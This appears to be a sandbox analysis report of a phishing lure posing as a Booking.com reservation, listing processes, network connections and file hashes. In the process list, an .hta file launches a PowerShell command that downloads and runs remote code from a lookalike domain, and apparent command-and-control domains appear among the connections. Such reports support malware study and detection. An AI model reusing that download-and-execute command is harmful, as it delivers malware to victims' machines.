PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\ID00909070698876REF.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc2d763cb8,0x7ffc2d763cc8,0x7ffc2d763cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3860 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6012 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,1889536730700571354,10404282318967258959,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Detail_booking_Reservation_ID00909070698876REF91293366999\Reservation Detail Booking.com REF002030030htg00s007777html999444.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object System.Net.WebClient).DownloadString('https://detail-booking.com.br/new.pdf'))

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 796

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 788

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 776

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 780

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\e639298e0f644b35a01d205bb2a89e98 /t 3296 /p 580

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Detail_booking_Reservation_ID00909070698876REF91293366999\Reservation Detail Booking.com REF002030030htg00s007777html999444.txt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc292cab58,0x7ffc292cab68,0x7ffc292cab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2060 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3208 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3508 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3828 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1852,i,15032562290086661291,3365183147006856179,131072 /prefetch:8

Network

Country Destination Domain Proto
GB 172.217.16.227:443 www.google.com.br tcp
GB 172.217.16.227:443 www.google.com.br tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
GB 172.217.16.227:443 www.google.com.br udp
GB 142.250.187.238:443 ogs.google.com.br tcp
GB 172.217.16.238:443 apis.google.com tcp
GB 172.217.169.3:443 ssl.gstatic.com tcp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 172.217.16.227:443 www.google.com.br udp
GB 142.250.200.2:443 adservice.google.com.br tcp
GB 172.217.169.46:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 172.217.169.46:443 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
GB 2.18.66.57:443 tcp
IE 20.50.80.213:443 browser.pipe.aria.microsoft.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
BE 2.17.107.113:443 r.bing.com tcp
GB 172.217.16.227:443 www.google.com.br udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
FR 52.109.68.130:443 odc.officeapps.live.com tcp
GB 172.217.169.46:443 play.google.com udp
BE 88.221.83.210:443 metadata.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
NL 2.18.121.198:443 binaries.templates.cdn.office.net tcp
GB 172.217.16.227:443 www.google.com.br udp
BE 92.123.52.178:443 www.santanderbank.com tcp
US 45.55.107.236:443 detail-booking.com.br tcp
US 104.21.53.215:443 www.detail-booking.com.br tcp
US 128.90.122.247:2019 cepas2023.duckdns.org tcp
US 128.90.122.247:2019 cepas2023.duckdns.org tcp
US 128.90.122.247:2900 cepas2023.duckdns.org tcp
N/A 127.0.0.1:5155 tcp
N/A 127.0.0.1:5155 tcp
BR 187.24.0.11:9441 chromedata.webredirect.org tcp
GB 172.217.16.227:443 www.google.com.br udp
US 45.40.96.97:9999 tcp
BR 187.24.0.11:3313 chromedata.webredirect.org tcp
GB 172.217.16.227:443 www.google.com.br udp
US 128.90.122.247:8808 cepas2023.duckdns.org tcp
BR 187.24.0.11:9443 chromedata.webredirect.org tcp
BR 187.24.0.11:3314 chromedata.webredirect.org tcp
US 45.40.96.97:6666 tcp
US 128.90.122.247:2020 cepas2023.duckdns.org tcp
US 128.90.122.247:2020 cepas2023.duckdns.org tcp
US 8.8.8.8:53 chromedata.accesscam.org udp
BR 187.24.0.11:3313 chromedata.accesscam.org tcp
GB 172.217.16.227:443 www.google.com.br udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.16.238:443 apis.google.com udp
GB 172.217.169.46:443 play.google.com udp
GB 172.217.169.46:443 play.google.com tcp
GB 142.250.187.206:443 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
US 128.90.122.247:8808 cdt2023.ddns.net tcp
BR 187.24.0.11:9443 chromedata.webredirect.org tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8f2eb94e31cadfb6eb07e6bbe61ef7ae
SHA1 3f42b0d5a90408689e7f7941f8db72a67d5a2eab
SHA256 d222c8e3b19cda2657629a486faf32962e016fc66561ce0d17010afdb283c9de
SHA512 9f7f84149885b851e0bf7173c540e466a2b2eb9907d8b608f60360933328cc75d9d1b63640ea4ecc1e64ecc5dd7ee74d82903f96a8b4418ca56296641a8c0703

\??\pipe\LOCAL\crashpad_4076_HRPFCVIMZXIIFIKI

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d56e8f308a28ac4183257a7950ab5c89
SHA1 044969c58cef041a073c2d132fa66ccc1ee553fe
SHA256 0bc24451c65457abc1e4e340be2f8faceae6b6ec7768a21d44bcd14636543bae
SHA512 fd5798559f4025ec3408f5550b8671d394b1ec83b85fdac8c005b0cc3e183272bdd07db15a156a572c9c5e5798badf235dc10aae62a052efa8dd9dfdbdca8189

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cc0714b6e7776ce3ec1c133ca0d8bacb
SHA1 d663010dc36ddaf5092dd2db87e7dc1bfe650d31
SHA256 ed08835cbc7dd1529e77b985852918a75432de8ac9ee766d2c96947b3f617fc0
SHA512 09087634f2e5d9d31ff428d70b117a8bad8c6ba293a45681d67d2dd2096d29eeb68e78a1868746eb93e1f429a5913cc4599d1097029329b36895ec2fd355e0f3

C:\Users\Admin\Downloads\Detail_booking_Reservation_ID00909070698876REF91293366999.zip:Zone.Identifier

MD5 dce5191790621b5e424478ca69c47f55
SHA1 ae356a67d337afa5933e3e679e84854deeace048
SHA256 86a3e68762720abe870d1396794850220935115d3ccc8bb134ffa521244e3ef8
SHA512 a669e10b173fce667d5b369d230d5b1e89e366b05ba4e65919a7e67545dd0b1eca8bcb927f67b12fe47cbe22b0c54c54f1e03beed06379240b05b7b990c5a641

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f621648828eee0a408f7e4666d8ab77d
SHA1 6fabaa8369b5861f83594e71101a4ae02ce9309e
SHA256 4f2fa10ed01605421e785e2f694aae45090e18d4fbcb4cb062027fa1b9ddc236
SHA512 eb5747981a18a872ca358d3b38db7fc7294216f82064a9165e9b65fb2f2969d403ba608a39f6db2198210e7355847c7fe17e87ce3f643e75428b1ca91f9f6cf9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 37a02b567934a96b9830e89eaa245473
SHA1 13f5408a3b12fc49c4a06f449f79e7a5b1c70ce5
SHA256 c14e59951533714367ac1a8a7697037c0e88e6fee97c88c6afb4a65e94e7875c
SHA512 90e9e546030d2d5327dc5dd7792f211be37f45566cce2cdf56aae599864868a84f0880192cf80e486c28dbde03b62ce0fd13d9c2f8f94a19524c14925f69dcfe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 98ab7ef8c0f966b25ce1a5411abd1668
SHA1 a206662d4b31d43492a96aea010d680b3b06ad3b
SHA256 1abd4758a2e1a14bd8ba3b3715802daace68281f70fa751f49d3d5adf6a77725
SHA512 a5ec1bf81d81cddfc8c8248b41a8ca377bccf31ed831b5129330cacb47b3fb724ca72f68d28172b3c731692215eeae039213636c85d6c61658056aa1613d6d0a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a21c571fddd2d424f293c298badc9f30
SHA1 c6cdc69cab12675ab8c64d2fcbd9e601fd8044ca
SHA256 797d667ba04570c4dea0199c873c63f6d349f3c2b185ca21d612235b3c8dfead
